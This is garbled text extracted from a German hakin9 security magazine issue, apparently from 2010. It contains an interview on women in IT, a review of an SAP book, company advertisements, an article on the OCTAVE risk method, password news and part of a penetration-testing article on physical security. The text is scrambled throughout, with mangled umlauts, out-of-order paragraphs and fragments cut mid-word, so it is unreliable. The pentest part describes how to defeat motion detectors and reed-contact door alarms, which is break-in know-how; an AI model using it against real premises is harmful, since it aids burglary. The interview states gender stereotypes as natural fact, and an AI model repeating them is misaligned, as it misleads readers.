hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
